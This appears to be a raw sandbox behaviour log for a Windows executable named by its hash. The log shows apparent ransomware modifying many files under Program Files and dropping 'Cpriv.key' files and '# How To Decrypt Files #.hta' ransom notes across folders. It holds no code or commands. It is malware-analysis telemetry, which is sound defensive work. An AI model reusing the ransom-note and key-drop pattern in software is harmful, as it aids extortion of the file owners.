de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00397_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281632.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21296_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02451_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Xlate_Complete.xsn de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Module.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Oriel.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Document Parts\1033\14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099159.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0300912.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Help\Keywords.HxK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBARBLL.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECURL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\GIGGLE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21335_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.es\Proof.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTFORM.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\FORMS\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14769_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR47F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGATNGET.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\trusted.libraries de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153047.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDCNCLL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\be\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143748.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\EQUATION\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\1033\ADO210.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03731_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\UrbanResume.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts2.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Contacts.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0300520.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14677_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19582_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\TableTextService\TableTextServiceYi.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00222_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLPERF.H de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EquityMergeFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\DW\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\VelvetRose.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PROFILE\PROFILE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\FAX\OriginFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\STRTEDGE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152882.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01244_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\trusted.libraries de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10255_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\back_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\1.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BOLDSTRI\BOLDSTRI.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN002.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14831_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\activity16v.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02439_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01395_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\en-US\eula.rtf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BREEZE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02280_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143753.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PUBBA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\OneNote.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_plain_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\CALENDAR.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Extensions\external_extensions.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ACCSBAR.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\PUB60COR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 